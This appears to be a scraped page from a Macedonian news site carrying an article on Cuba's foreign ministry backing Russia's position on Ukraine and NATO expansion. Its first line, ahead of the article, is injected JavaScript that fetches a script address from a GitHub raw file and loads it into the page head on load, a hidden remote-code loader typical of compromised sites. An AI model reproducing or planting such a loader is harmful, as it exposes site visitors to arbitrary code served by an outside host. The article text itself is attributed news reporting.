;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Куба со поддршка до Русија - Антропол
АктуелноИнтернационално

Куба со поддршка до Русија

Куба ја поддржа Русија и побара од Западот да престане да интервенира во Украина. Владата на Куба се согласи со Русија во врска со моменталната криза што ја има со Украина и побара од западните земји, а особено од САД, да престанат да интервенираат и да наметнуваат проширување на НАТО.

,,Решеноста на Соединетите Американски Држави да наметнат агресивно проширување на НАТО кон границите на Руската Федерација претставува закана за националната безбедност на оваа земја и за регионалниот и меѓународниот мир“, се вели во соопштението на кубанското Министерство за надворешни работи.

Хавана уверува дека Владата на САД и се заканува на Русија веќе со недели и манипулира со меѓународната заедница за опасностите од “масовната инвазија“ на Украина. Оттаму дополнуваат дека САД испорачува оружје и воена технологија, распоредува војници во неколку земји во регионот, применува еднострани и неправедни санкции и се заканува со репресии.

,,Паралелно со тоа, тие започнаа антируска пропагандна кампања”, изјавија од кубанското Министерство за надворешни работи – Минрекс.

Според нив, Куба и претходно предупредила за опасностите од ваквите политики.

,,Интервенцијата на западните сили мора да престане! Не треба да се игнорира дека овие настани можат да имаат многу сериозни последици за меѓународниот мир и безбедност“, изјавил некогашниот кубански претседател, генерал Раул Кастро Руз, велат од Минрекс.

И во 2018 година, во рамките на ООН, новиот претседател, Мигел Дијаз-Канел Бермудез, предупредуваше дека ваквото континуирано проширување на НАТО кон границите со Русија предизвикува сериозни опасности.

,,Ги повикуваме САД и НАТО сериозно и реално да се позанимаваат со основаните барања за безбедносните гаранции на Руската Федерација, која има право да се брани“, се вели во соопштението на кубанската Влада.